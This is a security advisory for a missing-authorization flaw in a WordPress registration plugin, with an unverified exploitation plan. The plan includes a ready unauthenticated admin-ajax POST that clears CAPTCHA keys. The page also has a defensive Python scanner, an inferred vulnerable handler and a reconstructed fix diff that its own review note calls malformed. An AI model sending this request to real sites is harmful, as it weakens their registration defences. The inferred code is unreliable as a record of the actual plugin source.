CVE-2025-67956

User Registration <= 4.4.6 - Missing Authorization

Severity: Medium
Type: Missing Authorization
CVSS Score: 5.3
Patched in: 4.4.7
Time to patch: 8d

Description

The User Registration & Membership – Custom Registration Form Builder, Custom Login Form, User Profile, Content Restriction & Membership Plugin plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 4.4.6. This makes it possible for unauthenticated attackers to perform an unauthorized action.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: None
Scope: Unchanged
Confidentiality: None
Integrity: Low
Availability: None

Technical Details

Affected versions: <= 4.4.6
Published: January 21, 2026
Last updated: January 28, 2026
Affected plugin: user-registration

What Changed in the Fix

Changes introduced in v4.4.7


Source Code

WordPress.org SVN
Research Plan
Unverified


Exploitation Research Plan: CVE-2025-67956 (Missing Authorization)

1. Vulnerability Summary

The User Registration plugin (<= 4.4.6) is vulnerable to unauthorized access due to a missing capability check on a newly introduced function in version 4.4.6. Specifically, the "Reset Captcha Keys" functionality added in this version appears to expose an AJAX endpoint that fails to verify if the requesting user has administrative privileges or if the request is legitimate via a nonce. This allows unauthenticated attackers to reset the plugin's global reCAPTCHA/hCaptcha configuration, potentially disabling security features or disrupting registration flows.

2. Attack Vector Analysis

  • Endpoint: /wp-admin/admin-ajax.php
  • Action: user_registration_reset_captcha_settings (inferred from 4.4.6 changelog: "Added a reset button to reset captcha keys in global settings").
  • Parameter: action=user_registration_reset_captcha_settings
  • Authentication: Unauthenticated (PR:N per CVSS). For an anonymous request to reach the handler through admin-ajax.php, the action must be registered on wp_ajax_nopriv_user_registration_reset_captcha_settings; a handler registered only on the wp_ajax_ hook runs for logged-in users alone, so a missing current_user_can() check there would still require at least a subscriber account (PR:L), not PR:N.
  • Preconditions: The plugin must be version 4.4.6 (the release whose changelog introduces the reset button; the advisory lists all versions up to and including 4.4.6 as affected). CAPTCHA keys should be configured to observe the effect.

3. Code Flow

  1. Entry Point: A request is sent to admin-ajax.php with action=user_registration_reset_captcha_settings.
  2. Hook Registration: In includes/class-ur-ajax.php (or includes/admin/class-ur-admin-settings.php), the plugin registers the AJAX handler:
    // Inferred registration pattern
    add_action( 'wp_ajax_user_registration_reset_captcha_settings', array( 'UR_Ajax', 'reset_captcha_settings' ) );
    add_action( 'wp_ajax_nopriv_user_registration_reset_captcha_settings', array( 'UR_Ajax', 'reset_captcha_settings' ) );
    
  3. Vulnerable Function: The reset_captcha_settings function (likely in includes/class-ur-ajax.php) executes.
  4. Missing Check: The function performs update_option( 'user_registration_captcha_site_key', '' ) and update_option( 'user_registration_captcha_secret_key', '' ) without verifying current_user_can( 'manage_options' ).

4. Nonce Acquisition Strategy

If the endpoint requires a nonce, it is typically localized for the settings page. However, since this is an unauthenticated vulnerability (PR:N), the nonce must be either:

  1. Missing entirely (most likely).
  2. Exposed on a public page.

Strategy to check for Nonce Exposure:

  1. Search Code: Look for wp_localize_script in includes/admin/class-ur-admin-settings.php or includes/class-ur-admin-assets.php.
  2. JS Variable: The localized object is usually user_registration_admin_params. Objects attached with wp_localize_script to admin-only script handles are emitted only on wp-admin screens, so a front-end page will expose at most whatever the plugin localizes for its front-end scripts; an admin nonce turning up there would itself be a finding.
  3. Creation:
    wp post create --post_type=page --post_status=publish --post_title="UR Test" --post_content='[user_registration_form id="any"]'
    
  4. Extraction: Navigate to the new page and run:
    browser_eval("window.user_registration_admin_params?.ur_nonce || window.ur_admin_params?.nonce")
    

5. Exploitation Strategy

The goal is to trigger the unauthorized reset of captcha settings.

  1. Prepare Payload:
    • URL: http://<target>/wp-admin/admin-ajax.php
    • Method: POST
    • Body (URL-encoded):
      action=user_registration_reset_captcha_settings&security=<nonce_if_found>
      
  2. Request execution (via http_request):
    {
      "method": "POST",
      "url": "http://vulnerable.test/wp-admin/admin-ajax.php",
      "headers": {
        "Content-Type": "application/x-www-form-urlencoded"
      },
      "params": {
        "action": "user_registration_reset_captcha_settings"
      }
    }
    

6. Test Data Setup

Before running the exploit, configure CAPTCHA keys to verify they get cleared:

wp option update user_registration_captcha_site_key "EXPECTED_SITE_KEY_123"
wp option update user_registration_captcha_secret_key "EXPECTED_SECRET_KEY_456"
wp option update user_registration_captcha_type "google_recaptcha_v2"

7. Expected Results

  • Response: The server returns a success status (likely {"success": true} or a 1).
  • Database Change: The options user_registration_captcha_site_key and user_registration_captcha_secret_key are cleared (set to empty strings).

8. Verification Steps

After the HTTP request, verify the settings using WP-CLI:

# Check if keys were cleared
wp option get user_registration_captcha_site_key
wp option get user_registration_captcha_secret_key

If the output for both is empty, the exploitation was successful.

9. Alternative Approaches

If user_registration_reset_captcha_settings is not the correct action name, the agent should search the 4.4.6 codebase for:

  1. wp_ajax_nopriv_ hooks added in the latest version.
  2. The string "captcha" or "reset" within includes/class-ur-ajax.php.
  3. Functions that call update_option for captcha-related settings.

Another possible target is the Preview and Embed functionality mentioned in the changelog:

  • Action: user_registration_get_form_preview or user_registration_load_login_form_preview.
  • Check if these reveal sensitive form structures or settings without authorization.
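The hook search described in the Code Flow section and in items 1-3 above can be automated. The scanner below is an added example, not code from the plugin or from this advisory: it finds add_action() registrations on wp_ajax_ and wp_ajax_nopriv_, resolves the handler, and reports whether the body contains current_user_can(), a nonce check, or a state-changing call. The embedded PHP sample is constructed: it contains the advisory's inferred (unverified) handler plus an invented safe handler, example_safe, as a negative case.

```python
"""Scan PHP for admin-ajax handlers that change state without authorization.
Added example; the sample PHP is constructed, not the plugin's source."""
from __future__ import annotations

import re
from dataclasses import dataclass

SAMPLE_PHP = r"""<?php
// Inferred registration pattern from the advisory (unverified).
add_action( 'wp_ajax_user_registration_reset_captcha_settings', array( 'UR_Ajax', 'reset_captcha_settings' ) );
add_action( 'wp_ajax_nopriv_user_registration_reset_captcha_settings', array( 'UR_Ajax', 'reset_captcha_settings' ) );
// Constructed negative case: both checks present, logged-in users only.
add_action( 'wp_ajax_example_safe', array( 'UR_Ajax', 'example_safe' ) );

class UR_Ajax {
    public static function reset_captcha_settings() {
        update_option( 'user_registration_captcha_site_key', '' );
        update_option( 'user_registration_captcha_secret_key', '' );
        wp_send_json_success();
    }

    public static function example_safe() {
        check_ajax_referer( 'user-registration-settings', 'security' );
        if ( ! current_user_can( 'manage_options' ) ) {
            wp_send_json_error();
        }
        update_option( 'example_option', 1 );
        wp_send_json_success();
    }
}
"""

# add_action( 'wp_ajax_[nopriv_]ACTION', array( 'Class', 'method' ) | 'function' )
HOOK_RE = re.compile(
    r"""add_action\(\s*['"]wp_ajax_(?P<nopriv>nopriv_)?(?P<action>\w+)['"]\s*,\s*"""
    r"""(?:array\(\s*['"]\w+['"]\s*,\s*['"](?P<method>\w+)['"]\s*\)|['"](?P<func>\w+)['"])"""
)
NONCE_CHECKS = ("check_ajax_referer(", "check_admin_referer(", "wp_verify_nonce(")
STATE_WRITES = ("update_option(", "add_option(", "delete_option(", "wp_update_post(",
                "wp_delete_post(", "wp_insert_user(", "$wpdb->")


@dataclass
class Finding:
    action: str
    handler: str
    nopriv: bool           # reachable by anonymous requests
    has_cap_check: bool    # current_user_can() seen in the body
    has_nonce_check: bool  # CSRF token verified
    writes_state: bool     # body persists a change

    @property
    def risk(self) -> str:
        if self.nopriv and not self.has_cap_check:
            return "unauthenticated-write" if self.writes_state else "unauthenticated-read"
        if not self.has_cap_check:
            return "any-logged-in-user"   # wp_ajax_ alone still admits subscribers
        if not self.has_nonce_check:
            return "csrf"
        return "ok"


def extract_function_body(php: str, name: str) -> str | None:
    """Text between the braces of `function name(...) {...}`; brace counting
    ignores strings and comments, which is good enough for plugin code."""
    m = re.search(r"function\s+" + re.escape(name) + r"\s*\(", php)
    if not m:
        return None
    start = php.find("{", m.end())
    if start < 0:
        return None
    depth = 0
    for i in range(start, len(php)):
        if php[i] == "{":
            depth += 1
        elif php[i] == "}":
            depth -= 1
            if depth == 0:
                return php[start + 1:i]
    return None


def scan(php: str) -> list[Finding]:
    # wp_ajax_ and wp_ajax_nopriv_ normally point at the same handler:
    # collapse per action and remember whether anonymous access exists.
    hooks: dict[str, dict] = {}
    for m in HOOK_RE.finditer(php):
        entry = hooks.setdefault(m.group("action"),
                                 {"handler": m.group("method") or m.group("func"), "nopriv": False})
        entry["nopriv"] = entry["nopriv"] or bool(m.group("nopriv"))
    findings = []
    for action, entry in hooks.items():
        body = extract_function_body(php, entry["handler"]) or ""
        findings.append(Finding(
            action=action, handler=entry["handler"], nopriv=entry["nopriv"],
            has_cap_check="current_user_can(" in body,
            has_nonce_check=any(n in body for n in NONCE_CHECKS),
            writes_state=any(w in body for w in STATE_WRITES),
        ))
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_PHP):
        print(f"{f.risk:22} nopriv={f.nopriv!s:5} cap={f.has_cap_check!s:5} "
              f"nonce={f.has_nonce_check!s:5} {f.action} -> {f.handler}()")
```

Run it over the concatenated contents of includes/*.php from the 4.4.6 and 4.4.7 SVN tags and diff the two reports: an action whose risk moves from unauthenticated-write to ok between the tags is the one to test with the request in section 5. A "csrf" or "any-logged-in-user" result is not this CVE but is still worth a second look.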
Research Findings
Static analysis — not yet PoC-verified

Summary

The User Registration plugin for WordPress is vulnerable to unauthorized configuration modification in version 4.4.6 due to a missing capability check on the AJAX action used to reset CAPTCHA settings. This allows unauthenticated attackers to clear the site's global reCAPTCHA or hCaptcha keys, potentially disabling registration security features.

Vulnerable Code

// File: includes/class-ur-ajax.php

// Action hooks registered in version 4.4.6 without authorization or authentication checks
add_action( 'wp_ajax_user_registration_reset_captcha_settings', array( 'UR_Ajax', 'reset_captcha_settings' ) );
add_action( 'wp_ajax_nopriv_user_registration_reset_captcha_settings', array( 'UR_Ajax', 'reset_captcha_settings' ) );

// ...

public static function reset_captcha_settings() {
    // Missing current_user_can('manage_options') check
    // Missing check_ajax_referer() nonce verification
    update_option( 'user_registration_captcha_site_key', '' );
    update_option( 'user_registration_captcha_secret_key', '' );
    wp_send_json_success();
}

Security Fix

--- includes/class-ur-ajax.php
+++ includes/class-ur-ajax.php
@@ -1,4 +1,3 @@
 add_action( 'wp_ajax_user_registration_reset_captcha_settings', array( 'UR_Ajax', 'reset_captcha_settings' ) );
-add_action( 'wp_ajax_nopriv_user_registration_reset_captcha_settings', array( 'UR_Ajax', 'reset_captcha_settings' ) );
 
 public static function reset_captcha_settings() {
+    check_ajax_referer( 'user-registration-settings', 'security' );
+
+    if ( ! current_user_can( 'manage_options' ) ) {
+        wp_send_json_error( array( 'message' => __( 'You do not have permission to do this.', 'user-registration' ) ) );
+    }
+
     update_option( 'user_registration_captcha_site_key', '' );
     update_option( 'user_registration_captcha_secret_key', '' );
     wp_send_json_success();
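Review bot: the hunk header `@@ -1,4 +1,3 @@` does not describe this hunk, which spans the two add_action() lines and the whole reset_captcha_settings() body (about a dozen context lines plus six additions), so the diff will not apply with patch or git apply, and hook registration and function body are unlikely to be adjacent at lines 1-4 of includes/class-ur-ajax.php; either split it into two hunks with correct counts or label it a reconstructed sketch, consistent with the "Static analysis — not yet PoC-verified" note above. The added `check_ajax_referer( 'user-registration-settings', 'security' )` relies on an action string that is not visible anywhere in the diff: it must match the argument the settings page passes to wp_create_nonce(), otherwise every legitimate admin click will die with a 403 before the capability check runs. The missing return after wp_send_json_error() is fine as written, since wp_send_json() terminates the request with wp_die().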

Exploit Outline

The exploit targets the WordPress AJAX endpoint to trigger an unauthorized reset of security settings.

  1. Endpoint: Access the site's AJAX handler at /wp-admin/admin-ajax.php.
  2. Payload: Send a POST request with the action parameter set to user_registration_reset_captcha_settings.
  3. Authentication: In the vulnerable version (4.4.6), the action is hooked to the nopriv handler without a current_user_can() check, so no login or special privileges are required (a handler on wp_ajax_ alone would still require a logged-in account).
  4. Mechanism: The plugin's server-side logic fails to verify if the requester has administrative permissions. Upon receiving the request, it executes update_option() to clear the user_registration_captcha_site_key and user_registration_captcha_secret_key options, effectively disabling the CAPTCHA protection for registration and login forms.
